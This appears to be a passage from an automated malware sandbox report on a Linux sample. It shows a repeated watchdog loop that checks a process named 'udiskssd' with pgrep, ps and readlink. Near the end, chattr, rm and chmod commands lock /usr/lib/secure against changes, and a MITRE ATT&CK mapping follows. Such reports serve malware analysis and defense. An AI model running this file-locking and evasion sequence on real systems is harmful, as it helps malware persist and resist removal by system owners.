- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6308
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads runtime system information
    PID:6309
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6310
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6311
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6312
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6313
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6314
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6315
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6316
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6317
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6318
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6319
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6320
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6321
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6322
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:6323
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6324
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6325
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6326
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6327
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6328
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6329
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6330
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6331
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6332
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6333
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6334
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:6335
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6336
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    PID:6338
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6339
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6340
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6341
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    PID:6342
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6343
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6344
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6345
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6346
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6347
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:6348
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6349
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6350
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6351
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6352
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6353
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6354
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6355
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:6356
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6357
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6358
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6359
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6360
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6361
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6362
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6363
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6364
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6365
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads runtime system information
    PID:6366
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6367
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6368
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6369
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6370
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6371
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6372
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6373
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:6374
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6375
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6376
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6377
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6378
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6379
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6380
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6381
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6382
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6383
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6384
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6385
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6386
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6387
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6388
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6389
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6390
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6391
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6392
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6393
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6394
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6395
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6396
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6397
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    PID:6398
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6399
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6400
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6402
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6403
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6404
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6405
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:6406
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6407
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6408
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:6409
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6410
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6411
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6412
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6413
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6414
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6415
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6416
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:6417
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:6418
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    PID:6419
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6420
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6421
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads runtime system information
    PID:6422
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6423
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6424
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6425
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6426
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6427
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6428
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6429
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:6430
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6431
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6432
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6433
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6434
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:6435
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:6436
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:6437
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:6438
- /usr/bin/chattr
  chattr -ia /usr/lib/secure/atdb
  2⤵
  - Attempts to change immutable files
  PID:2806
- /usr/bin/rm
  rm -f /usr/lib/secure/atdb
  2⤵
  PID:2807
- /usr/bin/chattr
  chattr +i /usr/lib/secure
  2⤵
  - Attempts to change immutable files
  PID:2808
- /usr/bin/chmod
  chmod -w /usr/lib/secure
  2⤵
  PID:2809

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

Credential Access

Discovery

System Information Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks